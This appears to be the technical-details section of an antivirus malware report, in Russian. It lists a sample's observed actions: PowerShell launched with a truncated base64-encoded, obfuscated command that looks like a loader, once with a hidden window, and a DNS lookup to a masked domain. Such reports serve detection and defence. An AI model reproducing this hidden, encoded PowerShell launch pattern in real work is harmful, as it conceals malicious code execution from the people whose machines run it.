Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e LgAoACgAdgBhAFIASQBBAEIAbABlACAAJwAqAG0ARABSACoAJwApAC4AbgBhAG0ARQBbADMALAAxADEALAAyAF0ALQBqAE8AaQBuACcAJwApACgAIABOAEUAdwAtAE8AYgBqAGUAQwB0ACAAUwBZAFMAVABFAE0ALgBJAG8ALgBTAHQAUgBFAEEATQBSAE...
- DNS ASK oo###dnqwe.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e LgAoACgAdgBhAFIASQBBAEIAbABlACAAJwAqAG0ARABSACoAJwApAC4AbgBhAG0ARQBbADMALAAxADEALAAyAF0ALQBqAE8AaQBuACcAJwApACgAIABOAEUAdwAtAE8AYgBqAGUAQwB0ACAAUwBZAFMAVABFAE0ALgBJAG8ALgBTAHQAUgBFAEEATQBSAE...' (со скрытым окном)